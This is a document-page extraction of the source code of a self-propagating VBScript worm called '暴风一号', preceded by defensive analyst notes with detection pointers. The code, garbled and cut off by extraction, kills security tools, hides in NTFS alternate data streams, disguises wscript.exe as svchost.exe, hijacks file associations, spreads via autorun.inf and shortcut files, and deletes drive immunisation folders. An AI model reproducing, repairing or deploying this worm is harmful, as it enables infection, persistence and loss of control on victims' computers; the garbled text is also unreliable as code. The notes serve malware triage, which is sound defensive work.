暴风一号源码.doc_第1页

' Analyst notes (defensive triage of the listing below).
'
' The listing is a document-site extraction of a self-propagating VBScript.
' String quotes, backslashes, comparison operators and line breaks were lost in
' extraction, part of main() is missing, and the last function is cut off, so
' the text is not runnable as shown. Registry and file paths in these notes have
' their separators restored for readability; all values come from the listing.
'
' Observable behaviour, by routine:
'   main           - on a date condition (month(date) = day(date)) calls
'                    virusalert and makejoke, then monitorsystem. The argument
'                    handling around it is missing from this copy.
'   monitorsystem  - endless loop with a 3000 ms sleep: killprocess,
'                    invadesystem, keepprocess.
'   killprocess    - WMI Win32_Process query per name (cmd.exe, regedit.exe,
'                    regedit.scr, regedit.pif, msconfig.exe; some array entries
'                    were lost), Terminate, then an "ntsd -c q -p" fallback.
'   getmainvirus   - names the script <system-drive serial number>.vbs. On NTFS
'                    the path is smss.exe:<serial>.vbs (n=1) or
'                    explorer.exe:<serial>.vbs (n=0) under GetSpecialFolder(n),
'                    i.e. an alternate data stream on an existing file;
'                    otherwise a plain file in that folder.
'   invadesystem   - rewrites both script copies, copies wscript.exe from
'                    GetSpecialFolder(1) to GetSpecialFolder(0)\system\svchost.exe,
'                    writes the Load, Ver and Date values under
'                    HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows,
'                    and re-points the shell command values to
'                    "wscript.exe <script>" for txtfile, inifile, inffile,
'                    batfile, cmdfile, regfile, chm.file, hlpfile,
'                    Applications\iexplore.exe and the CLSIDs
'                    871c5380-42a0-1069-a2ea-08002b30309d and
'                    20d04fe0-3aea-1069-a2d8-08002b30309d.
'   regset         - sets CheckedValue under Explorer\Advanced\Folder\Hidden
'                    (NOHIDDEN=3, SHOWALL=2), sets HKCU ...\Policies\Explorer
'                    NoDriveTypeAutoRun=0 and deletes HKCR\lnkfile\IsShortcut.
'                    Presumably this keeps hidden files out of view, leaves
'                    AutoRun enabled for every drive type and removes the
'                    shortcut overlay - confirm on a lab image.
'   createautorun  - for every ready drive of type 1, 2 or 3 writes
'                    <drive serial>.vbs and an autorun.inf that starts it via
'                    wscript.exe, both with attributes=6 (hidden + system).
'   killimmunity   - if a FOLDER named autorun.inf exists at the drive root
'                    (a common "immunisation" trick), grants Everyone full
'                    control with cacls and removes it with rd /s /q.
'   infectroot     - sets attributes=6 on each top-level folder and creates a
'                    .lnk targeting the script (icon shell32.dll index 3,
'                    window style 4). The .lnk file name was lost in extraction;
'                    presumably it mirrors the folder name.
'   keepprocess    - relaunches the script through the svchost.exe copy when
'                    vbsprocesscount reports too few instances (operator lost).
'   virusalert     - writes bfalert.hta under GetSpecialFolder(1), hides it and
'                    runs it; the HTA markup was lost in extraction.
'   makejoke       - toggles the first CD-ROM tray through WMPlayer.OCX,
'                    "times" iterations with a 3000 ms pause.
'
' Detection and clean-up pointers derived from the above:
'   - Load / Ver / Date values under the HKCU ...\Windows key named above.
'   - shell command values of the listed file classes containing wscript.exe.
'   - svchost.exe located in <Windows>\system\ rather than System32.
'   - alternate data streams on smss.exe and explorer.exe (dir /r, or the
'     Sysinternals streams tool).
'   - autorun.inf plus a serial-number-named .vbs at drive roots, and hidden +
'     system top-level folders shadowed by .lnk files.
'   - NoDriveTypeAutoRun=0, tampered Hidden CheckedValue entries, missing
'     HKCR\lnkfile\IsShortcut.
'   - wscript.exe / cscript.exe processes whose command line references a .vbs
'     file at a drive root or inside an ADS.
'   Disabling AutoRun by policy and restricting Windows Script Host for
'   ordinary users blocks the propagation and launch paths shown here.
on error resume nextdim fso,wshshellset fso=createobject(scripting.filesystemobject)set wshshell=createobject(wscript.shell)call main()sub main()on error resume nextdim args, virusload, virusassset args=wscript.argumentsvirusload=getmainvirus(1)virusass=getmainvirus(0)argnum=0do while argnum 0 and month(date) = day(date) then call virusalert() call makejoke(cint(month(date) end if call monitorsystem()end selectend subsub monitorsystem()on error resume next:dim processnames, exefullnamesprocessnames=array(cmd.exe,,regedit.exe,regedit.scr,regedit.pif,,msconfig.exe)vbsfullnames=array(getmainvirus(1)do call killprocess(processnames) call invadesystem(getmainvirus(1),getmainvirus(0) call keepprocess(vbsfullnames) wscript.sleep 3000loopend subsub invadesystem(virusloadpath,virusasspath)on error resume nextdim load_value, file_value, ie_value, mycpt_value1, mycpt_value2, hcuload, hcuver, viruscode, versionload_value=&virusloadpath&file_value=%systemroot%system32wscript.exe &virusasspath& %1 %* ie_value=%systemroot%system32wscript.exe &virusasspath& oie mycpt_value1=%systemroot%system32wscript.exe &virusasspath& omc mycpt_value2=%systemroot%system32wscript.exe &virusasspath& emc hcuload=hkey_current_usersoftwaremicrosoftwindows ntcurrentversionwindowsloadhcuver=hkey_current_usersoftwaremicrosoftwindows ntcurrentversionwindowsverhcudate=hkey_current_usersoftwaremicrosoftwindows ntcurrentversionwindowsdateviruscode=getcode(wscript.scriptfullname)version=1hostsourcepath=fso.getspecialfolder(1)&wscript.exehostfilepath=fso.getspecialfolder(0)&systemsvchost.exefor each drive in fso.drives if drive.isready and (drive.drivetype=1 or drive.drivetype=2 or drive.drivetype=3) then diskvirusname=getserialnumber(drive.driveletter)&.vbs call createautorun(drive.driveletter,diskvirusname) call infectroot(drive.driveletter,diskvirusname) end ifnextif fso.fileexists(virusasspath)=false or fso.fileexists(virusloadpath)=false or fso.fileexists(hostfilepath)=false or getversion() version then 
if getfilesystemtype(getsystemdrive()=ntfs then call createfile(viruscode,virusasspath) call createfile(viruscode,virusloadpath) call copyfile(hostsourcepath,hostfilepath) call sethiddenattr(hostfilepath) else call createfile(viruscode, virusasspath) call sethiddenattr(virusasspath) call createfile(viruscode,virusloadpath) call sethiddenattr(virusloadpath) call copyfile(hostsourcepath, hostfilepath) call sethiddenattr(hostfilepath) end ifend ifif readreg(hcuload)load_value then call writereg (hcuload, load_value, )end ifif getversion() version then call writereg (hcuver, version, )end ifif getinfecteddate() = then call writereg (hcudate, date, )end ifif readreg(hkey_local_machinesoftwareclassestxtfileshellopencommand)file_value then call settxtfileass(virusasspath)end ifif readreg(hkey_local_machinesoftwareclassesinifileshellopencommand)file_value then call setinifileass(virusasspath)end ifif readreg(hkey_local_machinesoftwareclassesinffileshellopencommand)file_value then call setinffileass(virusasspath)end ifif readreg(hkey_local_machinesoftwareclassesbatfileshellopencommand)file_value then call setbatfileass(virusasspath)end ifif readreg(hkey_local_machinesoftwareclassescmdfileshellopencommand)file_value then call setcmdfileass(virusasspath)end ifif readreg(hkey_local_machinesoftwareclassesregfileshellopencommand)file_value then call setregfileass(virusasspath)end ifif readreg(hkey_local_machinesoftwareclasseschm.fileshellopencommand)file_value then call setchmfileass(virusasspath)end ifif readreg(hkey_local_machinesoftwareclasseshlpfileshellopencommand)file_value then call sethlpfileass(virusasspath)end ifif readreg(hkey_local_machinesoftwareclassesapplicationsiexplore.exeshellopencommand)ie_value then call setieass(virusasspath)end ifif readreg(hkey_classes_rootclsid871c5380-42a0-1069-a2ea-08002b30309dshellopenhomepagecommand)ie_value then call setieass(virusasspath)end ifif 
readreg(hkey_classes_rootclsid20d04fe0-3aea-1069-a2d8-08002b30309dshellopencommand)mycpt_value1 then all setmycomputerass(virusasspath)end ifif readreg(hkey_classes_rootclsid20d04fe0-3aea-1069-a2d8-08002b30309dshellexplorecommand)mycpt_value2 then call setmycomputerass(virusasspath)end ifcall regset()end subsub copyfile(source, pathf)on error resume nextif fso.fileexists(pathf) then fso.deletefile pathf , trueend iffso.copyfile source, pathfend subsub createfile(code, pathf)on error resume nextdim filetextif fso.fileexists(pathf) then set filetext=fso.opentextfile(pathf, 2, false) filetext.write code filetext.closeelse set filetext=fso.opentextfile(pathf, 2, true) filetext.write code filetext.closeend ifend subsub createfile(code, pathf)on error resume nextdim filetextif fso.fileexists(pathf) then set filetext=fso.opentextfile(pathf, 2, false) filetext.write code filetext.closeelse set filetext=fso.opentextfile(pathf, 2, true) filetext.write code filetext.closeend ifend subsub regset()on error resume next dim regpath1 , regpath2, regpath3, regpath4regpath1=hkey_local_machinesoftwaremicrosoftwindowscurrentversionexploreradvancedfolderhiddennohiddencheckedvalueregpath2=hkey_local_machinesoftwaremicrosoftwindowscurrentversionexploreradvancedfolderhiddenshowallcheckedvalueregpath3=hkey_current_usersoftwaremicrosoftwindowscurrentversionpoliciesexplorernodrivetypeautorunregpath4=hkey_classes_rootlnkfileisshortcutcall writereg (regpath1, 3, reg_dword)call writereg (regpath2, 2, reg_dword)call writereg (regpath3, 0, reg_dword)call deletereg (regpath4)end subsub killprocess(processnames)on error resume nextset wmiservice=getobject(winmgmts:.rootcimv2)for each processname in processnames set processlist=wmiservice.execquery( select * from win32_process where name =&processname& ) for each process in processlist intreturn=process.terminate if intreturn0 then wshshell.run cmd /c ntsd -c q -p &process.handle, vbhide, false end if nextnextend subsub killimmunity(d)on error 
resume nextimmunityfolder=d&:autorun.infif fso.folderexists(immunityfolder) then wshshell.run (cmd /c cacls & &immunityfolder& & /t /e /c /g everyone:f),vbhide,true wshshell.run (cmd /c rd /s /q & immunityfolder), vbhide, trueend ifend subsub keepprocess(vbsfullnames)on error resume nextfor each vbsfullname in vbsfullnames if vbsprocesscount(vbsfullname) 2 then run(%systemroot%systemsvchost.exe &vbsfullname) end ifnextend subsub writereg(strkey, value, vtype)dim tmpsset tmps=createobject(wscript.shell)if vtype= then tmps.regwrite strkey, valueelse tmps.regwrite strkey, value, vtypeend ifset tmps=nothingend subsub deletereg(strkey)dim tmpsset tmps=createobject(wscript.shell)tmps.regdelete strkeyset tmps=nothingend subsub sethiddenattr(path)on error resume nextdim vfset vf=fso.getfile(path)set vf=fso.getfolder(path)vf.attributes=6end subsub run(exefullname)on error resume nextdim wshshellset wshshell=wscript.createobject(wscript.shell)wshshell.run exefullnameset wshshell=nothingend subsub infectroot(d,virusname)on error resume nextdim vbscodevbscode=getcode(wscript.scriptfullname)vbspath=d&:&virusnameif fso.fileexists(vbspath)=false then call createfile(vbscode, vbspath) call sethiddenattr(vbspath)end ifset folder=fso.getfolder(d&:)set subfolders=folder.subfoldersfor each subfolder in subfolders sethiddenattr(subfolder.path) lnkpath=d&:&&.lnk targetpath=d&:&virusname args=&d&:&& dir if fso.fileexists(lnkpath)=false or gettargetpath(lnkpath) targetpath then if fso.fileexists(lnkpath)=true then fso.deletefile lnkpath, true end if call createshortcut(lnkpath,targetpath,args) end ifnextend subsub createshortcut(lnkpath,targetpath,args)set shortcut=wshshell.createshortcut(lnkpath)with shortcut .targetpath=targetpath .arguments=args .windowstyle=4 .iconlocation=%systemroot%system32shell32.dll, 3 .saveend withend subsub createautorun(d,virusname)on error resume nextdim infpath, vbspath, 
vbscodeinfpath=d&:autorun.infvbspath=d&:&virusnamevbscode=getcode(wscript.scriptfullname)if fso.fileexists(infpath)=false or fso.fileexists(vbspath)=false then call createfile(vbscode, vbspath) call sethiddenattr(vbspath) strinf=autorun&vbcrlf&shellexecute=wscript.exe &virusname& autorun&vbcrlf&shellopen=(&o)&vbcrlf&shellopencommand=wscript.exe &virusname& autorun&vbcrlf&shellopendefault=1& vbcrlf&shellexplore=(&x)&vbcrlf&shellexplorecommand=wscript.exe &virusname& autorun call killimmunity(d) call createfile(strinf, infpath) call sethiddenattr(infpath)end ifend subsub settxtfileass(sfilepath)on error resume nextdim valuevalue=%systemroot%system32wscript.exe &sfilepath& %1 %* call writereg(hkey_local_machinesoftwareclassestxtfileshellopencommand, value, reg_expand_sz)end subsub setinifileass(sfilepath)on error resume nextdim valuevalue=%systemroot%system32wscript.exe &sfilepath& %1 %* call writereg(hkey_local_machinesoftwareclassesinifileshellopencommand, value, reg_expand_sz)end subsub setinffileass(sfilepath)on error resume nextdim valuevalue=%systemroot%system32wscript.exe &sfilepath& %1 %* call writereg(hkey_local_machinesoftwareclassesinffileshellopencommand, value, reg_expand_sz)end subsub setbatfileass(sfilepath)on error resume nextdim valuevalue=%systemroot%system32wscript.exe &sfilepath& %1 %* call writereg(hkey_local_machinesoftwareclassesbatfileshellopencommand, value, reg_expand_sz)end subsub setcmdfileass(sfilepath)on error resume nextdim valuevalue=%systemroot%system32wscript.exe &sfilepath& %1 %* call writereg(hkey_local_machinesoftwareclassescmdfileshellopencommand, value, reg_expand_sz)end subsub sethlpfileass(sfilepath)on error resume nextdim valuevalue=%systemroot%system32wscript.exe &sfilepath& %1 %* call writereg(hkey_local_machinesoftwareclasseshlpfileshellopencommand, value, reg_expand_sz)end subsub setregfileass(sfilepath)on error resume nextdim valuevalue=%systemroot%system32wscript.exe &sfilepath& %1 %* call 
writereg(hkey_local_machinesoftwareclassesregfileshellopencommand, value, reg_expand_sz)end subsub setchmfileass(sfilepath)on error resume nextdim valuevalue=%systemroot%system32wscript.exe &sfilepath& %1 %* call writereg(hkey_local_machinesoftwareclasseschm.fileshellopencommand, value, reg_expand_sz)end subsub setieass(sfilepath)on error resume nextdim valuevalue=%systemroot%system32wscript.exe &sfilepath& oie call writereg(hkey_local_machinesoftwareclassesapplicationsiexplore.exeshellopencommand, value, reg_expand_sz)call writereg(hkey_classes_rootclsid871c5380-42a0-1069-a2ea-08002b30309dshellopenhomepagecommand, value, reg_expand_sz)end subsub setmycomputerass(sfilepath)on error resume nextdim value1,value2value1=%systemroot%system32wscript.exe &sfilepath& omc value2=%systemroot%system32wscript.exe &sfilepath& emc call writereg(hkey_classes_rootclsid20d04fe0-3aea-1069-a2d8-08002b30309dshell, , reg_sz)call writereg(hkey_classes_rootclsid20d04fe0-3aea-1069-a2d8-08002b30309dshellopencommand, value1, reg_expand_sz)call writereg(hkey_classes_rootclsid20d04fe0-3aea-1069-a2d8-08002b30309dshellexplorecommand, value2, reg_expand_sz)end subsub virusalert()on error resume nextdim htapath,htacodehtapath=fso.getspecialfolder(1)&bfalert.htahtacode=&vbcrlf&vbcrlf&vbcrlf&n&vbcrlf&vbcrlf&if fso.fileexists(htapath)=false then call createfile(htacode, htapath) call sethiddenattr(htapath)end ifcall run(htapath)end subsub makejoke(times)on error resume nextdim wmp, colcdromsset wmp = createobject( wmplayer.ocx )set colcdroms = wmp.cdromcollectionif colcdroms.count 0 then for i=1 to times colcdroms.item(0).eject() wscript.sleep 3000 colcdroms.item(0).eject() nextend ifset wmp = nothingend subfunction getserialnumber(drv)on error resume nextset d=fso.getdrive(drv)getserialnumber=d.serialnumbergetserialnumber=replace(getserialnumber,-,)end functionfunction getmainvirus(n)on error resume nextmainvirusname=getserialnumber(getsystemdrive()&.vbsif getfilesystemtype(getsystemdrive()=ntfs 
then if n=1 then getmainvirus=fso.getspecialfolder(n)&smss.exe:&mainvirusname end if if n=0 then getmainvirus=fso.getspecialfolder(n)&explorer.exe:&mainvirusname end ifelse getmainvirus=fso.getspecialfolder(n)&mainvirusnameend ifend functionfunction vbsprocesscount(vbspath)on error resume nextdim wmiservice, processlist, processvbsprocesscount=0set wmiservice=getobject(winmgmts:.rootcimv2)set processlist=wmiservice.execquery(select * from win32_process where &name=cscript.exe or name=ws
